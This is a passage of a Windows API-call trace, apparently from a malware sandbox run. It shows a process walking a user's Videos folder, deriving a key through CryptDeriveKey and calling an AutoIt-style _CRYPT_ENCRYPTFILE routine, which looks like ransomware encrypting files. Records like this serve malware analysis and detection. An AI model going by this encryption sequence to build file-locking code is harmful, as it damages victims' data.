Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iHe dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="He dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QIhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hO\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SuitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uitfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tfltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tgQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qdh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dh7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.629] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsjOO.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.633] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.633] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0197.633] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.633] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.634] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.634] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.634] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.634] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0xd04bf290, ftLastWriteTime.dwHighDateTime=0x1d5df9f, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 0x90af58 [0197.634] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.634] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.635] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.635] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0197.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.635] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0197.635] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.635] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.635] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.635] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0197.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.636] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0197.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.637] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0197.637] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.637] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.638] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.638] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0197.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.638] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.638] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.638] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.639] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.639] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.639] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.639] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.639] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0197.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.639] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.639] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0197.640] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.640] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.640] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.640] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0197.640] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.640] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.640] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.640] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.640] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.640] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.640] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0197.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.641] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0197.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.641] CryptDestroyHash (hHash=0x90ae18) returned 1 [0197.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.641] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.645] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.645] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\suitfltgqdh7fzsjoo.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.646] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.646] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0197.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0197.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0197.647] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 